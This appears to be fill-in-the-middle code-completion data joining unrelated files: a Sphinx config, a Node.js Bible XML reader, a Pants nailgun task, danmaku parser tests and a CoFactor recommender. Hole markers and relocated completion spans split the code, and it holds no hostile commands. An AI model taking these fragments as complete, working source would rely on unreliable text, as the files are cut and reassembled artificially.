ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. 
todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. # "<project> v<release> documentation" by default. #html_title = 'Qcloud COS SDK for Python 3 v0.1.0' # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not None, a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. # The empty string is equivalent to '%b %d, %Y'. #html_last_updated_fmt = None # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # 'ja' uses this config value. # 'zh' user can custom change `jieba` dictionary path. #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. 
#html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'Qcloud COS SDK for Python 3doc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'Qcloud COS SDK for Python 3.tex', 'Qcloud COS SDK for Python 3 Documentation', 'Dan Su', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'Qcloud COS SDK for Python 3', 'Qcloud COS SDK for Python 3 Documentation', [author], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'Qcloud COS SDK for Python 3', 'Qcloud COS SDK for Python 3 Documentation', author, 'Qcloud COS SDK for Python 3', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False<|fim▁hole|>html_theme = "sphinx_rtd_theme" html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]<|fim▁end|>
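# Reviewer note: the completion above re-assigns html_theme (it was already set
# once in the prompt); the html_theme_path line is what the hole actually adds.
# On current sphinx_rtd_theme releases the path juggling is usually unnecessary
# (assumption about newer releases, not a change to the recorded row):
# html_theme = 'sphinx_rtd_theme'
# extensions.append('sphinx_rtd_theme')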
<|file_name|>bible.js<|end_file_name|><|fim▁begin|>/** * @overview Controller for a single Bible * @module bible * @author Dominik Sigmund * @version 0.1 * @description Creates an Object. Has specific methods to show and manipulate data * @memberof myVerses * @requires module:fs * @requires module:xml2js */ var fs = require('fs') var xml2js = require('xml2js') /** Creates a instance of class Bibles * @class Bibles * @param {string} xmlbible - Path to a XML-Bible from Zefania. * @param {function} callback - Called after all is done * @returns {object} The Working User Object * */ function Bible (xmlbible, callback) { var self = this self.bible = [] self.information = {} self.xmlbible = xmlbible var parser = new xml2js.Parser({ explicitArray: false, trim: true }) fs.readFile(xmlbible, function (err, data) { if (err) { return callback(err) } else { parser.parseString(data, function (err, result) { if (err) { return callback(err) } else { self.information = result.XMLBIBLE.INFORMATION result.XMLBIBLE.BIBLEBOOK.forEach(function (xbook) { var book = { name: (typeof xbook['$'].bname !== 'undefined') ? xbook['$'].bname : '', number: xbook['$'].bnumber, short: (typeof xbook['$'].bsname !== 'undefined') ? xbook['$'].bsname : '', chapters: [] } if (xbook.CHAPTER.length > 0) { xbook.CHAPTER.forEach(function (xchapter) { var chapter = { number: xchapter['$'].cnumber, verses: [] } if (xchapter.VERS.length > 0) { xchapter.VERS.forEach(function (xverse) { var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) }) } else { var xverse = xchapter.VERS var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) } book.chapters.push(chapter) }) } else { var xchapter = xbook.CHAPTER var chapter = { number: xchapter['$'].cnumber, verses: [] } if (xchapter.VERS.length > 0) { xchapter.VERS.forEach(function (xverse) { var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) }) } else { var xverse = xchapter.VERS var verse = { number: xverse['$'].vnumber, text: xverse['_'] } chapter.verses.push(verse) } book.chapters.push(chapter) } self.bible.push(book) }) } }) } }) } // ------------------------------------------------------------------------------------------------------------- /** Return the Information Object * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getInformation = function (callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else {<|fim▁hole|> callback(null, this.information) } } /** Sync Return the Information Object * @returns {object} - An information object * */ Bible.prototype.getInformationSync = function () { return this.information } // ------------------------------------------------------------------------------------------------------------- /** Return the Bible Object * @param {callback} callback - error-first callback, having the return-data as second parameter * */ Bible.prototype.getBible = function (callback) { if (typeof callback !== 'function') { console.error('No Callback given') return null } else { callback(null, this.bible) } } /** Sync Return the Bible Object * @returns {object} - A bible object * */ Bible.prototype.getBibleSync = function () { return this.bible } // ------------------------------------------------------------------------------------------------------------- /** Return All books in the bible * @param {callback} callback - error-first callback, having the 
return-data as second parameter
 * */
Bible.prototype.getBooks = function (callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    // this.bible is the array of books built in the constructor (there is no .books wrapper)
    if (this.bible.length < 1) {
      callback({status: 404, message: 'No Books in Bible'})
    } else {
      callback(null, this.bible)
    }
  }
}
/** Sync Return All books in the bible
 * @returns {array} - An array of books
 * */
Bible.prototype.getBooksSync = function () {
  return this.bible
}
// -------------------------------------------------------------------------------------------------------------
/** Return the Book Object
 * @param {string} number - The number of the Book
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getBook = function (number, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var book = returnBook(this.bible, number)
    if (book === null) {
      callback({status: 404, message: 'No Book with Number ' + number + ' found'})
    } else {
      callback(null, book)
    }
  }
}
/** Sync Return the Book Object
 * @param {string} number - The number of the Book
 * @returns {object} - A Book object
 * */
Bible.prototype.getBookSync = function (number) {
  return returnBook(this.bible, number)
}
/** Return the Book Object
 * @param {array} bible - Array of books
 * @param {string} number - The number of the Book
 * @returns {object} - A Book object
 * */
function returnBook (bible, number) {
  for (var i = 0; i < bible.length; i++) {
    if (bible[i].number === number) {
      return bible[i]
    }
  }
  return null
}
// -------------------------------------------------------------------------------------------------------------
/** Return All chapters in the book
 * @param {string} bookid - The ID of the Book
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getChapters = function (bookid, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var chapters = returnChapters(this.bible, bookid)
    if (chapters === null || chapters.length < 1) {
      callback({status: 404, message: 'No Chapters in Book with Number ' + bookid + ' found'})
    } else {
      callback(null, chapters)
    }
  }
}
/** Sync Return All chapters in the book
 * @param {string} bookid - The ID of the Book
 * @returns {array} - An array of chapters
 * */
Bible.prototype.getChaptersSync = function (bookid) {
  return returnChapters(this.bible, bookid)
}
/** Return All chapters in the book
 * @param {array} bible - Array of books
 * @param {string} number - The number of the Book
 * @returns {array} - An array of chapters
 * */
function returnChapters (bible, number) {
  for (var i = 0; i < bible.length; i++) {
    if (bible[i].number === number) {
      return bible[i].chapters
    }
  }
  return null
}
// -------------------------------------------------------------------------------------------------------------
/** Return the Chapter Object
 * @param {string} bookid - The ID of the Book
 * @param {string} nr - The Nr of the Chapter
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getChapter = function (bookid, nr, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var chapter = returnChapter(this.bible, bookid, nr)
    if (chapter === null) {
      callback({status: 404, message: 'No Chapter with Number ' + nr + ' in Book with Number ' + bookid + ' found'})
    } else {
      callback(null, chapter)
    }
  }
}
/** Sync Return the Chapter Object
 * @param {string} bookid - The ID of the Book
 * @param {string} nr - The Nr of the Chapter
 * @returns {object} - A Chapter object
 * */
Bible.prototype.getChapterSync = function (bookid, nr) {
  return returnChapter(this.bible, bookid, nr)
}
/** Return the Chapter Object
 * @param {array} bible - Array of books
 * @param {string} bookid - The ID of the Book
 * @param {string} chapterid - The Nr of the Chapter
 * @returns {object} - A Chapter object
 * */
function returnChapter (bible, bookid, chapterid) {
  for (var i = 0; i < bible.length; i++) {
    if (bible[i].number === bookid) {
      for (var j = 0; j < bible[i].chapters.length; j++) { // was i++: endless loop
        if (bible[i].chapters[j].number === chapterid) {
          return bible[i].chapters[j]
        }
      }
    }
  }
  return null
}
// -------------------------------------------------------------------------------------------------------------
/** Return All Verses in the chapter
 * @param {string} bookid - The ID of the Book
 * @param {string} chapter - The Nr of the Chapter
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getVerses = function (bookid, chapter, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var verses = returnVerses(this.bible, bookid, chapter)
    if (verses === null || verses.length < 1) {
      callback({status: 404, message: 'No Verses in Chapter with Number ' + chapter + ' in Book with Number ' + bookid + ' found'})
    } else {
      callback(null, verses)
    }
  }
}
/** Sync Return All Verses in the chapter
 * @param {string} bookid - The ID of the Book
 * @param {string} chapter - The Nr of the Chapter
 * @returns {array} - An array of verses
 * */
Bible.prototype.getVersesSync = function (bookid, chapter) {
  return returnVerses(this.bible, bookid, chapter)
}
/** Return All Verses in the chapter
 * @param {array} bible - Array of books
 * @param {string} bookid - The ID of the Book
 * @param {string} chapterid - The Nr of the Chapter
 * @returns {array} - An array of verses
 * */
function returnVerses (bible, bookid, chapterid) {
  for (var i = 0; i < bible.length; i++) {
    if (bible[i].number === bookid) {
      for (var j = 0; j < bible[i].chapters.length; j++) { // was i++: endless loop
        if (bible[i].chapters[j].number === chapterid) {
          return bible[i].chapters[j].verses
        }
      }
    }
  }
  return null
}
// -------------------------------------------------------------------------------------------------------------
/** Return the Verse Object
 * @param {string} bookid - The ID of the Book
 * @param {string} chapter - The Nr of the Chapter
 * @param {string} nr - The Nr of the Verse
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getVerse = function (bookid, chapter, nr, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var verse = returnVerse(this.bible, bookid, chapter, nr)
    if (verse === null) {
      callback({status: 404, message: 'No Verse with Number ' + nr + ' in Chapter with Number ' + chapter + ' in Book with Number ' + bookid + ' found'})
    } else {
      callback(null, verse)
    }
  }
}
/** Sync Return the Verse Object
 * @param {string} bookid - The ID of the Book
 * @param {string} chapter - The Nr of the Chapter
 * @param {string} nr - The Nr of the Verse
 * @returns {object} - A Verse object
 * */
Bible.prototype.getVerseSync = function (bookid, chapter, nr) {
  return returnVerse(this.bible, bookid, chapter, nr)
}
/** Return the Verse Object
 * @param {array} bible - Array of books
 * @param {string} bookid - The ID of the Book
 * @param {string} chapterid - The Nr of the Chapter
 * @param {string} verseid - The Nr of the Verse
 * @returns {object} - A Verse object
 * */
function returnVerse (bible, bookid, chapterid, verseid) {
  for (var i = 0; i < bible.length; i++) {
    if (bible[i].number === bookid) {
      for (var j = 0; j < bible[i].chapters.length; j++) { // was i++: endless loop
        if (bible[i].chapters[j].number === chapterid) {
          for (var k = 0; k < bible[i].chapters[j].verses.length; k++) {
            if (bible[i].chapters[j].verses[k].number === verseid) {
              return bible[i].chapters[j].verses[k]
            }
          }
        }
      }
    }
  }
  return null
}
// -------------------------------------------------------------------------------------------------------------
/** Return the Verse Object
 * @param {string} code - The Code of the Verse BOOKID-CHAPTER-VERSE
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.getVerseByCode = function (code, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var verse = returnVerseByCode(this.bible, code)
    if (verse === null) {
      callback({status: 404, message: 'No Verse with Code ' + code + ' found'})
    } else {
      callback(null, verse)
    }
  }
}
/** Sync Return the Verse Object
 * @param {string} code - The Code of the Verse BOOKID-CHAPTER-VERSE
 * @returns {object} - A Verse object
 * */
Bible.prototype.getVerseByCodeSync = function (code) {
  return returnVerseByCode(this.bible, code)
}
/** Return the Verse Object
 * @param {array} bible - Array of books
 * @param {string} code - The Code of the Verse BOOKID-CHAPTER-VERSE
 * @returns {object} - A Verse object
 * */
function returnVerseByCode (bible, code) {
  var tmp = code.split('-')
  return returnVerse(bible, tmp[0], tmp[1], tmp[2])
}
// -------------------------------------------------------------------------------------------------------------
/** Return All Verses in the bible matching the text
 * @param {string} text - The Query to search for
 * @param {callback} callback - error-first callback, having the return-data as second parameter
 * */
Bible.prototype.search = function (text, callback) {
  if (typeof callback !== 'function') {
    console.error('No Callback given')
    return null
  } else {
    var verses = returnSearch(this.bible, text)
    if (verses.length < 1) {
      callback({status: 404, message: 'No Verse with Query ' + text + ' found'})
    } else {
      callback(null, verses)
    }
  }
}
/** Sync Return All Verses in the bible matching the text
 * @param {string} text - The Query to search for
 * @returns {array} - An array of verses
 * */
Bible.prototype.searchSync = function (text) {
  return returnSearch(this.bible, text)
}
/** Return All Verses in the bible matching the text
 * @param {array} bible - Array of books
 * @param {string} query - The Query to search for
 * @returns {array} - An array of verses
 * */
function returnSearch (bible, query) {
  var verses = []
  for (var i = 0; i < bible.length; i++) {
    for (var j = 0; j < bible[i].chapters.length; j++) { // was i++: endless loop
      for (var k = 0; k < bible[i].chapters[j].verses.length; k++) {
        if (bible[i].chapters[j].verses[k].text.includes(query)) {
          verses.push(bible[i].chapters[j].verses[k])
        }
      }
    }
  }
  return verses
}
// -------------------------------------------------------------------------------------------------------------
module.exports = Bible<|fim▁end|>
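// Reviewer note: minimal usage sketch for the module above (XML path is
// hypothetical). As written, the constructor only calls its callback on
// read/parse errors; the success path fills `bible.bible` without notifying,
// so callers should treat the sync getters as usable only after loading:
// var Bible = require('./bible')
// var bible = new Bible('./zefania-bible.xml', function (err) {
//   if (err) { console.error(err) }
// })
// // once loading has finished:
// // bible.getVerseByCodeSync('1-1-1')  // -> verse { number, text } or null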
<|file_name|>nailgun_task.py<|end_file_name|><|fim▁begin|># coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import os from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin from pants.base.exceptions import TaskError from pants.java import util from pants.java.executor import SubprocessExecutor from pants.java.jar.jar_dependency import JarDependency from pants.java.nailgun_executor import NailgunExecutor, NailgunProcessGroup from pants.pantsd.subsystem.subprocess import Subprocess from pants.task.task import Task, TaskBase class NailgunTaskBase(JvmToolTaskMixin, TaskBase): ID_PREFIX = 'ng' @classmethod def register_options(cls, register): super(NailgunTaskBase, cls).register_options(register) register('--use-nailgun', type=bool, default=True, help='Use nailgun to make repeated invocations of this task quicker.') register('--nailgun-timeout-seconds', advanced=True, default=10, type=float, help='Timeout (secs) for nailgun startup.') register('--nailgun-connect-attempts', advanced=True, default=5, type=int, help='Max attempts for nailgun connects.') cls.register_jvm_tool(register, 'nailgun-server', classpath=[ JarDependency(org='com.martiansoftware', name='nailgun-server',<|fim▁hole|> @classmethod def subsystem_dependencies(cls): return super(NailgunTaskBase, cls).subsystem_dependencies() + (Subprocess.Factory,) def __init__(self, *args, **kwargs): """ :API: public """ super(NailgunTaskBase, self).__init__(*args, **kwargs) id_tuple = (self.ID_PREFIX, self.__class__.__name__) self._identity = '_'.join(id_tuple) self._executor_workdir = os.path.join(self.context.options.for_global_scope().pants_workdir, *id_tuple) def create_java_executor(self): """Create java executor that uses this task's ng daemon, if allowed. Call only in execute() or later. TODO: Enforce this. """ if self.get_options().use_nailgun: classpath = os.pathsep.join(self.tool_classpath('nailgun-server')) return NailgunExecutor(self._identity, self._executor_workdir, classpath, self.dist, connect_timeout=self.get_options().nailgun_timeout_seconds, connect_attempts=self.get_options().nailgun_connect_attempts) else: return SubprocessExecutor(self.dist) def runjava(self, classpath, main, jvm_options=None, args=None, workunit_name=None, workunit_labels=None, workunit_log_config=None): """Runs the java main using the given classpath and args. If --no-use-nailgun is specified then the java main is run in a freshly spawned subprocess, otherwise a persistent nailgun server dedicated to this Task subclass is used to speed up amortized run times. :API: public """ executor = self.create_java_executor() # Creating synthetic jar to work around system arg length limit is not necessary # when `NailgunExecutor` is used because args are passed through socket, therefore turning off # creating synthetic jar if nailgun is used. 
create_synthetic_jar = not self.get_options().use_nailgun try: return util.execute_java(classpath=classpath, main=main, jvm_options=jvm_options, args=args, executor=executor, workunit_factory=self.context.new_workunit, workunit_name=workunit_name, workunit_labels=workunit_labels, workunit_log_config=workunit_log_config, create_synthetic_jar=create_synthetic_jar, synthetic_jar_dir=self._executor_workdir) except executor.Error as e: raise TaskError(e) # TODO(John Sirois): This just prevents ripple - maybe inline class NailgunTask(NailgunTaskBase, Task): """ :API: public """ pass class NailgunKillall(Task): """Kill running nailgun servers.""" @classmethod def register_options(cls, register): super(NailgunKillall, cls).register_options(register) register('--everywhere', type=bool, help='Kill all nailguns servers launched by pants for all workspaces on the system.') def execute(self): NailgunProcessGroup().killall(everywhere=self.get_options().everywhere)<|fim▁end|>
rev='0.9.1'), ])
<|file_name|>test_danmaku_process.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from unittest import TestCase from nose.tools import eq_ from mock import Mock from datetime import datetime from tests.constants import STRING, NUMBER, DATE from tests.asserters import eq_obj from danmaku.cores.danmaku_process import generate_danmaku from danmaku.cores.danmaku_process import process_recieve_data from danmaku.models import DANMU_MSG, SEND_GIFT, WELCOME, SEND_TOP from danmaku.models.danmaku import DanmakuModel from danmaku.configs.personal_settings import TIME_FORMAT from danmaku.helpers import convert_hexascii_to_int def test_generate_danmaku(): msg = { u'info': [ [ 0, 1, 25, 16777215, 1441727762, 1585812335, 0, u'c8de2b91', 0], u'xxxxx', [ NUMBER, u'xxxx', 0, u'0'] ], u'cmd': u'DANMU_MSG', u'roomid': NUMBER } danmaku_type = DANMU_MSG publisher = msg['info'][2][1].encode('utf-8') content = msg['info'][1].encode('utf-8') is_vip = msg['info'][2][2] == 1 is_admin = int(msg['info'][2][3].encode('utf-8')) == 1 expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': NUMBER, u'cmd': u'SEND_GIFT', u'data': { u'top_list': [ {u'uname': u'xxx', u'coin': NUMBER, u'uid': NUMBER}, ], u'uid': NUMBER, u'timestamp': 1441727778, u'price': NUMBER, u'giftId': 1, u'uname': u'xxxxx', u'num': NUMBER, u'rcost': NUMBER, u'super': 0, u'action': u'\u5582\u98df', u'giftName': u'\u8fa3\u6761' } } danmaku_type = SEND_GIFT publisher = msg['data']['uname'].encode('utf-8') content = ''.join( [str(msg['data']['num']), ' X ', msg['data']['giftName'].encode('utf-8'), ' 目前共花销:', str(msg['data']['rcost'])]) is_vip = False is_admin = False expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': NUMBER, u'cmd': u'WELCOME', u'data': { u'uname': u'xxxxxr', u'isadmin': 0, u'uid': NUMBER } } danmaku_type = WELCOME publisher = msg['data']['uname'].encode('utf-8') is_vip = True content = None is_admin = msg['data']['isadmin'] == 1 expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) msg = { u'roomid': u'11111', u'cmd': u'SEND_TOP', u'data': { u'top_list': [ {u'uname': u'xxxx', u'coin': NUMBER, u'uid': NUMBER}, ]<|fim▁hole|> } } danmaku_type = SEND_TOP tops = msg["data"]['top_list'] contents = ["{}: {} {}".format(top['uid'], top['uname'], top['coin']) for top in tops] content = '\n'.join(contents) publisher = "排行榜" is_vip = False is_admin = False expect_danmaku = DanmakuModel( publisher=publisher, content=content, recieved_time=datetime.now().strftime(TIME_FORMAT), danmaku_type=danmaku_type, is_admin=is_admin, is_vip=is_vip ) test_danmaku = generate_danmaku(msg) eq_obj(expect_danmaku, test_danmaku) def test_process_recieve_data(): # I have no idea to tests it. mock_fun = Mock(process_recieve_data) mock_fun.return_value = True eq_(mock_fun(), True)<|fim▁end|>
<|file_name|>CoFactor.py<|end_file_name|><|fim▁begin|>from base.iterativeRecommender import IterativeRecommender import numpy as np from util import config from collections import defaultdict from math import log,exp from scipy.sparse import * from scipy import * class CoFactor(IterativeRecommender): def __init__(self, conf, trainingSet=None, testSet=None, fold='[1]'): super(CoFactor, self).__init__(conf, trainingSet, testSet, fold) def readConfiguration(self): super(CoFactor, self).readConfiguration() extraSettings = config.OptionConf(self.config['CoFactor']) self.negCount = int(extraSettings['-k']) #the number of negative samples if self.negCount < 1: self.negCount = 1 self.regR = float(extraSettings['-gamma']) self.filter = int(extraSettings['-filter']) def printAlgorConfig(self): super(CoFactor, self).printAlgorConfig() print('Specified Arguments of', self.config['model.name'] + ':') print('k: %d' % self.negCount) print('regR: %.5f' %self.regR) print('filter: %d' %self.filter) print('=' * 80) def initModel(self): super(CoFactor, self).initModel() #constructing SPPMI matrix self.SPPMI = defaultdict(dict) print('Constructing SPPMI matrix...') #for larger data set has many items, the process will be time consuming occurrence = defaultdict(dict) i=0 for item1 in self.data.item: i += 1 if i % 100 == 0: print(str(i) + '/' + str(self.num_items)) uList1, rList1 = self.data.itemRated(item1) if len(uList1) < self.filter: continue for item2 in self.data.item: if item1 == item2: continue if item2 not in occurrence[item1]: uList2, rList2 = self.data.itemRated(item2) if len(uList2) < self.filter: continue count = len(set(uList1).intersection(set(uList2))) if count > self.filter: occurrence[item1][item2] = count occurrence[item2][item1] = count maxVal = 0 frequency = {} for item1 in occurrence: frequency[item1] = sum(occurrence[item1].values()) * 1.0 D = sum(frequency.values()) * 1.0 # maxx = -1 for item1 in occurrence: for item2 in occurrence[item1]: try: val = max([log(occurrence[item1][item2] * D / (frequency[item1] * frequency[item2])) - log( self.negCount), 0]) except ValueError: print(self.SPPMI[item1][item2]) print(self.SPPMI[item1][item2] * D / (frequency[item1] * frequency[item2])) if val > 0: if maxVal < val: maxVal = val self.SPPMI[item1][item2] = val self.SPPMI[item2][item1] = self.SPPMI[item1][item2] #normalize for item1 in self.SPPMI: for item2 in self.SPPMI[item1]: self.SPPMI[item1][item2] = self.SPPMI[item1][item2]/maxVal def buildModel(self): self.X=self.P*10 #Theta self.Y=self.Q*10 #Beta self.w = np.random.rand(self.num_items) / 10 # bias value of item self.c = np.random.rand(self.num_items) / 10 # bias value of context self.G = np.random.rand(self.num_items, self.emb_size) / 10 # context embedding print('training...') epoch = 0 while epoch < self.maxEpoch: self.loss = 0 YtY = self.Y.T.dot(self.Y) for user in self.data.user: # C_u = np.ones(self.data.getSize(self.recType)) H = np.ones(self.num_items) val, pos = [],[] P_u = np.zeros(self.num_items) uid = self.data.user[user] for item in self.data.trainSet_u[user]: iid = self.data.item[item] r_ui = float(self.data.trainSet_u[user][item]) pos.append(iid) val.append(10 * r_ui) H[iid] += 10 * r_ui P_u[iid] = 1 error = (P_u[iid] - self.X[uid].dot(self.Y[iid])) self.loss += pow(error, 2) # sparse matrix C_u = coo_matrix((val, (pos, pos)), shape=(self.num_items, self.num_items)) A = (YtY + np.dot(self.Y.T, C_u.dot(self.Y)) + self.regU * np.eye(self.emb_size)) self.X[uid] = np.dot(np.linalg.inv(A), (self.Y.T * H).dot(P_u)) XtX = 
self.X.T.dot(self.X) for item in self.data.item: P_i = np.zeros(self.num_users) iid = self.data.item[item] H = np.ones(self.num_users) val,pos = [],[] for user in self.data.trainSet_i[item]: uid = self.data.user[user] r_ui = float(self.data.trainSet_i[item][user]) pos.append(uid) val.append(10 * r_ui) H[uid] += 10 * r_ui P_i[uid] = 1 matrix_g1 = np.zeros((self.emb_size, self.emb_size)) matrix_g2 = np.zeros((self.emb_size, self.emb_size)) vector_m1 = np.zeros(self.emb_size) vector_m2 = np.zeros(self.emb_size) update_w = 0 update_c = 0 if len(self.SPPMI[item])>0: for context in self.SPPMI[item]: cid = self.data.item[context] gamma = self.G[cid] beta = self.Y[cid] matrix_g1 += gamma.reshape(self.emb_size, 1).dot(gamma.reshape(1, self.emb_size)) vector_m1 += (self.SPPMI[item][context]-self.w[iid]- self.c[cid])*gamma matrix_g2 += beta.reshape(self.emb_size, 1).dot(beta.reshape(1, self.emb_size)) vector_m2 += (self.SPPMI[item][context] - self.w[cid] - self.c[iid]) * beta update_w += self.SPPMI[item][context]-self.Y[iid].dot(gamma)-self.c[cid] update_c += self.SPPMI[item][context]-beta.dot(self.G[iid])-self.w[cid] C_i = coo_matrix((val, (pos, pos)), shape=(self.num_users, self.num_users)) A = (XtX + np.dot(self.X.T, C_i.dot(self.X)) + self.regU * np.eye(self.emb_size) + matrix_g1) self.Y[iid] = np.dot(np.linalg.inv(A), (self.X.T * H).dot(P_i)+vector_m1) if len(self.SPPMI[item]) > 0: self.G[iid] = np.dot(np.linalg.inv(matrix_g2 + self.regR * np.eye(self.emb_size)), vector_m2) self.w[iid] = update_w/len(self.SPPMI[item]) self.c[iid] = update_c/len(self.SPPMI[item]) epoch += 1 print('epoch:', epoch, 'loss:', self.loss) def predictForRanking(self,u): 'invoked to rank all the items for the user' if self.data.containsUser(u): u = self.data.getUserId(u) return self.Y.dot(self.X[u]) else:<|fim▁hole|><|fim▁end|>
return [self.data.globalMean] * self.num_items
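The heart of the CoFactor entry above is the shifted positive PMI value max(log(#(i,j) * D / (#(i) * #(j))) - log k, 0) computed in initModel. As a standalone illustration of just that step, here is a minimal Python sketch; the toy co-occurrence counts and variable names are hypothetical and not taken from the entry:

from collections import defaultdict
from math import log

# hypothetical toy co-occurrence counts between items (symmetric)
occurrence = {
    'a': {'b': 4, 'c': 1},
    'b': {'a': 4, 'c': 2},
    'c': {'a': 1, 'b': 2},
}
neg_count = 1  # the "k" negative samples that shift the PMI

frequency = {i: float(sum(pairs.values())) for i, pairs in occurrence.items()}
D = sum(frequency.values())

sppmi = defaultdict(dict)
for i, pairs in occurrence.items():
    for j, count in pairs.items():
        # shifted positive PMI: negative associations are clipped to zero
        val = max(log(count * D / (frequency[i] * frequency[j])) - log(neg_count), 0)
        if val > 0:
            sppmi[i][j] = val

print(dict(sppmi))  # only the positively associated pairs survive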
